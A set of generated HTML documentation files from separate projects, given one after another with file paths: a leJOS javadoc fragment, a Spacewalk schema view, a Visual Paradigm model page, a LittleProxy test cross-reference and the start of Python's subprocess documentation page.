<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="Wifi()"><!-- --></A><H3>
Wifi</H3>
<PRE>
public <B>Wifi</B>()</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="getLocalDevice(java.lang.String)"><!-- --></A><H3>
getLocalDevice</H3>
<PRE>
public static <A HREF="../../lejos/hardware/LocalWifiDevice.html" title="class in lejos.hardware">LocalWifiDevice</A> <B>getLocalDevice</B>(java.lang.String ifName)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getIfNames()"><!-- --></A><H3>
getIfNames</H3>
<PRE>
public static java.lang.String[] <B>getIfNames</B>()
throws java.io.IOException</PRE>
<DL>
<DD><DL>
<DT><B>Throws:</B>
<DD><CODE>java.io.IOException</CODE></DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../lejos/hardware/Sounds.html" title="interface in lejos.hardware"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../index.html?lejos/hardware/Wifi.html" target="_top"><B>FRAMES</B></A>
<A HREF="Wifi.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
documentation/db-schema/view-RHNHISTORYVIEW_PACKAGES.html | colloquium/spacewalk | <?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title> Spacewalk DB Schema - View-RHNHISTORYVIEW_PACKAGES </title>
<link rel="stylesheet" type="text/css" href="oraschemadoc.css" />
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<meta name="author" content="Petr Vanek, petr@scribus.info" />
<meta name="generator" content="oraschemadoc" />
</head>
<body>
<div class="contextbar">
<a href="main.html">Main</a>
<a href="tables-list.html">Tables</a>
<a href="views-list.html">Views</a>
<a href="mviews-list.html">Materialized Views</a>
<a href="indexes-list.html">Indexes</a>
<a href="constraints-list.html">Constraints</a>
<a href="triggers-list.html">Triggers</a>
<a href="procedures-list.html">Procedures</a>
<a href="functions-list.html">Functions</a>
<a href="packages-list.html">Packages</a>
<a href="sequences.html">Sequences</a>
<a href="java-sources-list.html">Java Sources</a>
<a href="jobs.html">Jobs</a>
<a href="sanity-check.html">Sanity Check</a>
<a href="symbol-index.html">Index</a>
<a href="sql_sources/" target="Main">DDL scrips</a>
</div><div class="subcontextbar"><a href="#v-descr">Description</a> <a href="#v-cols">Columns</a> <a href="#v-query">Query</a> <a href="#v-cc">Constraints</a> <a href="#v-trgs">Triggers</a> </div><h2>RHNHISTORYVIEW_PACKAGES</h2>
<a href="sql_sources/view/rhnhistoryview_packages.sql">DDL script</a><h3>Columns<a name="v-cols"></a></h3>
<table>
<tr><th>Name</th><th>Type</th><th>Nullable</th><th>Insertable</th><th>Updatable</th><th>Deletable</th><th>Comment</th></tr><tr><td>EVENT_ID<a name="col-EVENT_ID"></a></td><td>NUMBER(38)</td><td>N</td><td>NO</td><td>NO</td><td>NO</td><td> </td></tr>
<tr><td>SERVER_ID<a name="col-SERVER_ID"></a></td><td>NUMBER(38)</td><td>N</td><td>NO</td><td>NO</td><td>NO</td><td> </td></tr>
<tr><td>SUMMARY<a name="col-SUMMARY"></a></td><td>VARCHAR2(250)</td><td>Y</td><td>NO</td><td>NO</td><td>NO</td><td> </td></tr>
<tr><td>DETAILS<a name="col-DETAILS"></a></td><td>VARCHAR2(4000)</td><td>Y</td><td>NO</td><td>NO</td><td>NO</td><td> </td></tr>
<tr><td>CREATED<a name="col-CREATED"></a></td><td>DATE</td><td>N</td><td>NO</td><td>NO</td><td>NO</td><td> </td></tr>
<tr><td>MODIFIED<a name="col-MODIFIED"></a></td><td>DATE</td><td>N</td><td>NO</td><td>NO</td><td>NO</td><td> </td></tr>
</table><h3>Query:</h3>
<a name="v-query"></a><pre>
Legend: <span class="comment">comment</span> <span class="string">string</span> <span class="keyword">keyword</span> <span class="reserved">reserved word</span> <span class="operator">operator</span></pre>
<pre>
<span class="reserved">select</span>
sa<span class="operator">.</span>action_id event_id<span class="operator">,</span>
sa<span class="operator">.</span>server_id<span class="operator">,</span>
<span class="comment">-- summary</span>
<span class="reserved">at</span><span class="operator">.</span><span class="keyword">name</span> <span class="operator">|</span><span class="operator">|</span> <span class="operator">(</span> <span class="reserved">select</span> <span class="string">' ('</span> <span class="operator">|</span><span class="operator">|</span> <span class="keyword">count</span><span class="operator">(</span>name_id<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
decode<span class="operator">(</span><span class="keyword">count</span><span class="operator">(</span>name_id<span class="operator">)</span><span class="operator">,</span> 1<span class="operator">,</span> <span class="string">' package) '</span><span class="operator">,</span> <span class="string">' packages) '</span><span class="operator">)</span>
<span class="reserved">from</span> rhnActionPackage ap <span class="reserved">where</span> ap<span class="operator">.</span>action_id <span class="operator">=</span> sa<span class="operator">.</span>action_id <span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
<span class="string">' scheduled by '</span> <span class="operator">|</span><span class="operator">|</span> contact<span class="operator">.</span>login <span class="operator">|</span><span class="operator">|</span> <span class="string">' ('</span> <span class="operator">|</span><span class="operator">|</span> astat<span class="operator">.</span><span class="keyword">name</span> <span class="operator">|</span><span class="operator">|</span> <span class="string">')'</span> summary<span class="operator">,</span>
<span class="comment">-- details</span>
<span class="string">'This action will be executed after '</span> <span class="operator">|</span><span class="operator">|</span>
to_char<span class="operator">(</span><span class="keyword">a</span><span class="operator">.</span>earliest_action<span class="operator">,</span> <span class="string">'YYYY-MM-DD HH24:MI:SS'</span><span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> <span class="string">' EST'</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
<span class="string">'The current action status is: '</span> <span class="operator">|</span><span class="operator">|</span> astat<span class="operator">.</span><span class="keyword">name</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
nvl2<span class="operator">(</span>sa<span class="operator">.</span>pickup_time<span class="operator">,</span>
<span class="string">'The client picked up this action on '</span> <span class="operator">|</span><span class="operator">|</span>
to_char<span class="operator">(</span>sa<span class="operator">.</span>pickup_time<span class="operator">,</span> <span class="string">'YYYY-MM-DD HH24:MI:SS'</span><span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> <span class="string">' EST'</span><span class="operator">,</span>
<span class="string">'This action has not been picked up'</span><span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
nvl2<span class="operator">(</span>sa<span class="operator">.</span>completion_time<span class="operator">,</span>
<span class="string">'The client reported completion on execution on '</span> <span class="operator">|</span><span class="operator">|</span>
to_char<span class="operator">(</span>sa<span class="operator">.</span>completion_time<span class="operator">,</span> <span class="string">'YYYY-MM-DD HH24:MI:SS'</span><span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> <span class="string">' EST'</span><span class="operator">,</span>
<span class="string">'This action has not been fully executed'</span><span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
nvl2<span class="operator">(</span>sa<span class="operator">.</span>result_code<span class="operator">,</span>
<span class="string">'Client execution returned code '</span><span class="operator">|</span><span class="operator">|</span>to_char<span class="operator">(</span>sa<span class="operator">.</span>result_code<span class="operator">)</span><span class="operator">|</span><span class="operator">|</span>
<span class="string">' ('</span><span class="operator">|</span><span class="operator">|</span>nvl<span class="operator">(</span>sa<span class="operator">.</span>result_msg<span class="operator">,</span> <span class="string">'SUCCESS'</span><span class="operator">)</span><span class="operator">|</span><span class="operator">|</span><span class="string">')'</span><span class="operator">,</span>
<span class="string">''</span><span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
<span class="string">'Package list:'</span> <span class="operator">|</span><span class="operator">|</span> chr<span class="operator">(</span>10<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span> rhnHistoryView_pkglist<span class="operator">(</span>sa<span class="operator">.</span>action_id<span class="operator">)</span> <span class="operator">|</span><span class="operator">|</span>
<span class="string">''</span> details<span class="operator">,</span>
<span class="keyword">a</span><span class="operator">.</span>created<span class="operator">,</span>
sa<span class="operator">.</span>modified
<span class="reserved">from</span>
rhnAction <span class="keyword">a</span><span class="operator">,</span> rhnServerAction sa<span class="operator">,</span>
rhnActionType <span class="reserved">at</span><span class="operator">,</span> rhnActionStatus astat<span class="operator">,</span>
web_contact contact
<span class="reserved">where</span>
sa<span class="operator">.</span>action_id <span class="operator">=</span> <span class="keyword">a</span><span class="operator">.</span>id
<span class="reserved">and</span> <span class="keyword">a</span><span class="operator">.</span>action_type <span class="operator">=</span> <span class="reserved">at</span><span class="operator">.</span>id
<span class="reserved">and</span> <span class="keyword">a</span><span class="operator">.</span>scheduler <span class="operator">=</span> contact<span class="operator">.</span>id
<span class="reserved">and</span> sa<span class="operator">.</span>status <span class="operator">=</span> astat<span class="operator">.</span>id
<span class="reserved">and</span> <span class="reserved">at</span><span class="operator">.</span>label <span class="reserved">in</span> <span class="operator">(</span><span class="string">'packages.update'</span><span class="operator">,</span> <span class="string">'packages.remove'</span><span class="operator">)</span>
<span class="reserved">with</span>
<span class="keyword">read</span> <span class="keyword">only</span>
</pre>
<h3>Constraints: <a name="v-cc"></a></h3>
<table>
<tr><th>Constraint Name</th><th>Type</th></tr><tr><td>SYS_C009164<a name="cs-SYS_C009164"></a></td><td>With read only on view</td></tr>
</table><div class="footer">
Generated by <a href="http://www.yarpen.cz/oraschemadoc">OraSchemaDoc</a>,
(c) Petr Vanek, 2005; Aram Kananov, 2002, on Tue Nov 2 08:33:22 2010</div>
</body></html>
|
RSA_Algorithm/doc/vp_doc/content/ProjectFillColorModel_EJsmt2KAUrgcxQT4.html | eugcar/RSA_Algorithm | <html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="report.css" type="text/css"/>
<title></title>
<script type="text/javascript" src="report.js"></script>
<script type="text/javascript" src="link_popup.js"></script>
<script type="text/javascript" src="tooltip.js"></script>
</head>
<body style="margin-left: 10px; margin-right: 10px; margin-top: 10px; margin-bottom: 10px;">
<div id="vplink" style="position:absolute; z-index:21; visibility:hidden">
<table bordercolor="#A9BFD3" cellpadding="0" border="1" cellspacing="0">
<tr>
<td>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr style="background:#DDDDDD">
<td style="font-size: 12px;" align="left">
Link: </td>
<td style="font-size: 12px;" align="right">
<input id="vplink-checkbox" onClick="javascript: vpLinkToggleName()" type="checkbox" />
<label for="vplink-checkbox">with Name</label> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<textarea id="vplink-text" style="width: 348px; height: 60px; border-color: #7EADD9; outline: none;"></textarea> </td>
</tr>
</table>
</div>
<div class="HeaderText">
<span>
RSA_Algorithm Documentation </span>
</div>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td class="HeaderLine1">
</td>
</tr>
<tr>
<td class="HeaderLine2">
</td>
</tr>
<tr>
<td class="HeaderLine3">
</td>
</tr>
</table>
<p>
<a target="_content_pane" class="PageParentTitle" href="ProjectFormat_cesmt2KAUrgcxQQL.html">
ProjectFormat : ProjectFormat</a>
</p>
<p class="PageTitle">
ProjectFillColorModel - <a style="padding-left: 16px; font-size: 12px" onclick="javascript: showVpLink('RSA_Algorithm.vpp://modelelement/EJsmt2KAUrgcxQT4', '\nRSA_Algorithm.vpp://modelelement/EJsmt2KAUrgcxQT4', this); return false;" href="#">
<img src="../images/icons/link.png" border="0"> link</a>
</p>
<p>
</p>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td class="Category">
Properties </td>
</tr>
<tr>
<td class="TableCellSpaceHolder5PxTall">
</td>
</tr>
</table>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td colSpan="4" class="TableHeaderLine">
</td>
</tr>
<tr>
<td colSpan="4" class="TableHeaderLine1">
</td>
</tr>
<tr class="TableHeader">
<td class="TableCellSpaceHolder10Px">
</td>
<td width="25%">
<span class="TableHeaderText">Name</span> </td>
<td class="TableCellSpaceHolder20Px">
</td>
<td>
<span class="TableHeaderText">Value</span> </td>
</tr>
<tr>
<td colSpan="4" class="TableHeaderLine2">
</td>
</tr>
<tr class="TableRow1">
<td>
</td>
<td>
<span class="TableContent">Base Type</span> </td>
<td>
</td>
<td>
<span class="TableContent">ArchiMateApplicationCollaboration</span> </td>
</tr>
<tr class="TableRow2">
<td>
</td>
<td>
<span class="TableContent">Fill Color Type</span> </td>
<td>
</td>
<td>
<span class="TableContent">Solid</span> </td>
</tr>
<tr class="TableRow1">
<td>
</td>
<td>
<span class="TableContent">Fill Color Gradient Style</span> </td>
<td>
</td>
<td>
<span class="TableContent">S-N</span> </td>
</tr>
<tr class="TableRow2">
<td>
</td>
<td>
<span class="TableContent">Fill Color Transparency</span> </td>
<td>
</td>
<td>
<span class="TableContent">0</span> </td>
</tr>
<tr class="TableRow1">
<td>
</td>
<td>
<span class="TableContent">Fill Color Color1</span> </td>
<td>
</td>
<td>
<span class="TableContent">-983041</span> </td>
</tr>
<tr class="TableRow2">
<td>
</td>
<td>
<span class="TableContent">Fill Color Color2</span> </td>
<td>
</td>
<td>
<span class="TableContent">0</span> </td>
</tr>
</table>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td class="TableCellSpaceHolder1PxTall">
</td>
</tr>
<tr>
<td class="TableFooter">
</td>
</tr>
</table>
<p>
</p>
<p>
</p>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td class="Category">
Occupied Diagrams </td>
</tr>
<tr>
<td class="TableCellSpaceHolder5PxTall">
</td>
</tr>
</table>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr class="TableHeader">
<td class="TableCellSpaceHolder10Px">
</td>
<td>
<span class="TableHeaderText">Diagram</span> </td>
</tr>
<tr>
<td colSpan="2" class="TableHeaderLine2">
</td>
</tr>
</table>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td class="TableCellSpaceHolder1PxTall">
</td>
</tr>
<tr>
<td class="TableFooter">
</td>
</tr>
</table>
<div style="height: 20px;">
</div>
<table width="100%" cellpadding="0" border="0" cellspacing="0">
<tr>
<td class="FooterLine">
</td>
</tr>
</table>
<div class="HeaderText">
RSA_Algorithm Documentation </div>
</body>
</html>
|
server/appengine/static/littleproxy/xref-test/org/littleshoot/proxy/HttpRequestUriRuleTest.html | adamfisk/littleshoot-client | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1" /><title>HttpRequestUriRuleTest xref</title>
<link type="text/css" rel="stylesheet" href="../../../stylesheet.css" />
</head>
<body>
<div id="overview"><a href="../../../../../../../../apidocs/org/littleshoot/proxy/HttpRequestUriRuleTest.html">View Javadoc</a></div><pre>
<a name="1" href="#1">1</a> <strong>package</strong> org.littleshoot.proxy;
<a name="2" href="#2">2</a>
<a name="3" href="#3">3</a> <strong>import</strong> <strong>static</strong> org.junit.Assert.*;
<a name="4" href="#4">4</a>
<a name="5" href="#5">5</a> <strong>import</strong> java.util.List;
<a name="6" href="#6">6</a> <strong>import</strong> java.util.Set;
<a name="7" href="#7">7</a> <strong>import</strong> java.util.Map.Entry;
<a name="8" href="#8">8</a>
<a name="9" href="#9">9</a> <strong>import</strong> org.jboss.netty.buffer.ChannelBuffer;
<a name="10" href="#10">10</a> <strong>import</strong> org.jboss.netty.handler.codec.http.HttpMethod;
<a name="11" href="#11">11</a> <strong>import</strong> org.jboss.netty.handler.codec.http.HttpRequest;
<a name="12" href="#12">12</a> <strong>import</strong> org.jboss.netty.handler.codec.http.HttpVersion;
<a name="13" href="#13">13</a> <strong>import</strong> org.junit.Test;
<a name="14" href="#14">14</a>
<a name="15" href="#15">15</a> <em>/**<em>*</em></em>
<a name="16" href="#16">16</a> <em> * Test for HTTP request URI rules.</em>
<a name="17" href="#17">17</a> <em> */</em>
<a name="18" href="#18">18</a> <strong>public</strong> <strong>class</strong> <a href="../../../org/littleshoot/proxy/HttpRequestUriRuleTest.html">HttpRequestUriRuleTest</a> {
<a name="19" href="#19">19</a>
<a name="20" href="#20">20</a> @Test <strong>public</strong> <strong>void</strong> testMatching() throws Exception {
<a name="21" href="#21">21</a> <strong>final</strong> HttpRequestPathMatcher matcher =
<a name="22" href="#22">22</a> <strong>new</strong> HttpRequestPathMatcher(<span class="string">"/search"</span>);
<a name="23" href="#23">23</a>
<a name="24" href="#24">24</a> assertTrue(<span class="string">"Rule should have matches request"</span>,
<a name="25" href="#25">25</a> matcher.shouldFilterResponses(<strong>new</strong> HttpRequest() {
<a name="26" href="#26">26</a>
<a name="27" href="#27">27</a> <strong>public</strong> HttpMethod getMethod() {
<a name="28" href="#28">28</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="29" href="#29">29</a> <strong>return</strong> <strong>null</strong>;
<a name="30" href="#30">30</a> }
<a name="31" href="#31">31</a>
<a name="32" href="#32">32</a> <strong>public</strong> String getUri() {
<a name="33" href="#33">33</a> <strong>return</strong> <span class="string">"/search?hl=en&source=hp&q=bop&aq=f&aqi=g10&aql=&oq="</span>;
<a name="34" href="#34">34</a> }
<a name="35" href="#35">35</a>
<a name="36" href="#36">36</a> <strong>public</strong> <strong>void</strong> setMethod(HttpMethod method) {
<a name="37" href="#37">37</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="38" href="#38">38</a>
<a name="39" href="#39">39</a> }
<a name="40" href="#40">40</a>
<a name="41" href="#41">41</a> <strong>public</strong> <strong>void</strong> setUri(String uri) {
<a name="42" href="#42">42</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="43" href="#43">43</a>
<a name="44" href="#44">44</a> }
<a name="45" href="#45">45</a>
<a name="46" href="#46">46</a> <strong>public</strong> <strong>void</strong> addHeader(String name, Object value) {
<a name="47" href="#47">47</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="48" href="#48">48</a>
<a name="49" href="#49">49</a> }
<a name="50" href="#50">50</a>
<a name="51" href="#51">51</a> <strong>public</strong> <strong>void</strong> clearHeaders() {
<a name="52" href="#52">52</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="53" href="#53">53</a>
<a name="54" href="#54">54</a> }
<a name="55" href="#55">55</a>
<a name="56" href="#56">56</a> <strong>public</strong> <strong>boolean</strong> containsHeader(String name) {
<a name="57" href="#57">57</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="58" href="#58">58</a> <strong>return</strong> false;
<a name="59" href="#59">59</a> }
<a name="60" href="#60">60</a>
<a name="61" href="#61">61</a> <strong>public</strong> ChannelBuffer getContent() {
<a name="62" href="#62">62</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="63" href="#63">63</a> <strong>return</strong> <strong>null</strong>;
<a name="64" href="#64">64</a> }
<a name="65" href="#65">65</a>
<a name="66" href="#66">66</a> <strong>public</strong> <strong>long</strong> getContentLength() {
<a name="67" href="#67">67</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="68" href="#68">68</a> <strong>return</strong> 0;
<a name="69" href="#69">69</a> }
<a name="70" href="#70">70</a>
<a name="71" href="#71">71</a> <strong>public</strong> <strong>long</strong> getContentLength(<strong>long</strong> defaultValue) {
<a name="72" href="#72">72</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="73" href="#73">73</a> <strong>return</strong> 0;
<a name="74" href="#74">74</a> }
<a name="75" href="#75">75</a>
<a name="76" href="#76">76</a> <strong>public</strong> String getHeader(String name) {
<a name="77" href="#77">77</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="78" href="#78">78</a> <strong>return</strong> <strong>null</strong>;
<a name="79" href="#79">79</a> }
<a name="80" href="#80">80</a>
<a name="81" href="#81">81</a> <strong>public</strong> Set<String> getHeaderNames() {
<a name="82" href="#82">82</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="83" href="#83">83</a> <strong>return</strong> <strong>null</strong>;
<a name="84" href="#84">84</a> }
<a name="85" href="#85">85</a>
<a name="86" href="#86">86</a> <strong>public</strong> List<Entry<String, String>> getHeaders() {
<a name="87" href="#87">87</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="88" href="#88">88</a> <strong>return</strong> <strong>null</strong>;
<a name="89" href="#89">89</a> }
<a name="90" href="#90">90</a>
<a name="91" href="#91">91</a> <strong>public</strong> List<String> getHeaders(String name) {
<a name="92" href="#92">92</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="93" href="#93">93</a> <strong>return</strong> <strong>null</strong>;
<a name="94" href="#94">94</a> }
<a name="95" href="#95">95</a>
<a name="96" href="#96">96</a> <strong>public</strong> HttpVersion getProtocolVersion() {
<a name="97" href="#97">97</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="98" href="#98">98</a> <strong>return</strong> <strong>null</strong>;
<a name="99" href="#99">99</a> }
<a name="100" href="#100">100</a>
<a name="101" href="#101">101</a> <strong>public</strong> <strong>boolean</strong> isChunked() {
<a name="102" href="#102">102</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="103" href="#103">103</a> <strong>return</strong> false;
<a name="104" href="#104">104</a> }
<a name="105" href="#105">105</a>
<a name="106" href="#106">106</a> <strong>public</strong> <strong>boolean</strong> isKeepAlive() {
<a name="107" href="#107">107</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="108" href="#108">108</a> <strong>return</strong> false;
<a name="109" href="#109">109</a> }
<a name="110" href="#110">110</a>
<a name="111" href="#111">111</a> <strong>public</strong> <strong>void</strong> removeHeader(String name) {
<a name="112" href="#112">112</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="113" href="#113">113</a>
<a name="114" href="#114">114</a> }
<a name="115" href="#115">115</a>
<a name="116" href="#116">116</a> <strong>public</strong> <strong>void</strong> setChunked(<strong>boolean</strong> chunked) {
<a name="117" href="#117">117</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="118" href="#118">118</a>
<a name="119" href="#119">119</a> }
<a name="120" href="#120">120</a>
<a name="121" href="#121">121</a> <strong>public</strong> <strong>void</strong> setContent(ChannelBuffer content) {
<a name="122" href="#122">122</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="123" href="#123">123</a>
<a name="124" href="#124">124</a> }
<a name="125" href="#125">125</a>
<a name="126" href="#126">126</a> <strong>public</strong> <strong>void</strong> setHeader(String name, Object value) {
<a name="127" href="#127">127</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="128" href="#128">128</a>
<a name="129" href="#129">129</a> }
<a name="130" href="#130">130</a>
<a name="131" href="#131">131</a> <strong>public</strong> <strong>void</strong> setHeader(String name, Iterable<?> values) {
<a name="132" href="#132">132</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="133" href="#133">133</a>
<a name="134" href="#134">134</a> }
<a name="135" href="#135">135</a>
<a name="136" href="#136">136</a> <strong>public</strong> <strong>void</strong> setProtocolVersion(HttpVersion version) {
<a name="137" href="#137">137</a> <em class="comment">// TODO Auto-generated method stub</em>
<a name="138" href="#138">138</a>
<a name="139" href="#139">139</a> }
<a name="140" href="#140">140</a>
<a name="141" href="#141">141</a> }));
<a name="142" href="#142">142</a> }
<a name="143" href="#143">143</a> }
</pre>
<hr/><div id="footer">This page was automatically generated by <a href="http://maven.apache.org/">Maven</a></div></body>
</html>
|
live-build-config/config/includes.chroot/usr/share/documentation/python/3.4.3/library/subprocess.html | cybint-io/cybint-linux | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>17.5. subprocess — Subprocess management — Python 3.4.3 documentation</title>
<link rel="stylesheet" href="../_static/pydoctheme.css" type="text/css" />
<link rel="stylesheet" href="../_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '../',
VERSION: '3.4.3',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="../_static/jquery.js"></script>
<script type="text/javascript" src="../_static/underscore.js"></script>
<script type="text/javascript" src="../_static/doctools.js"></script>
<script type="text/javascript" src="../_static/sidebar.js"></script>
<link rel="search" type="application/opensearchdescription+xml"
title="Search within Python 3.4.3 documentation"
href="../_static/opensearch.xml"/>
<link rel="author" title="About these documents" href="../about.html" />
<link rel="copyright" title="Copyright" href="../copyright.html" />
<link rel="top" title="Python 3.4.3 documentation" href="../index.html" />
<link rel="up" title="17. Concurrent Execution" href="concurrency.html" />
<link rel="next" title="17.6. sched — Event scheduler" href="sched.html" />
<link rel="prev" title="17.4. concurrent.futures — Launching parallel tasks" href="concurrent.futures.html" />
<link rel="shortcut icon" type="image/png" href="../_static/py.png" />
<script type="text/javascript" src="../_static/copybutton.js"></script>
<script type="text/javascript" src="../_static/version_switch.js"></script>
</head>
<body>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="../genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="../py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="sched.html" title="17.6. sched — Event scheduler"
accesskey="N">next</a> |</li>
<li class="right" >
<a href="concurrent.futures.html" title="17.4. concurrent.futures — Launching parallel tasks"
accesskey="P">previous</a> |</li>
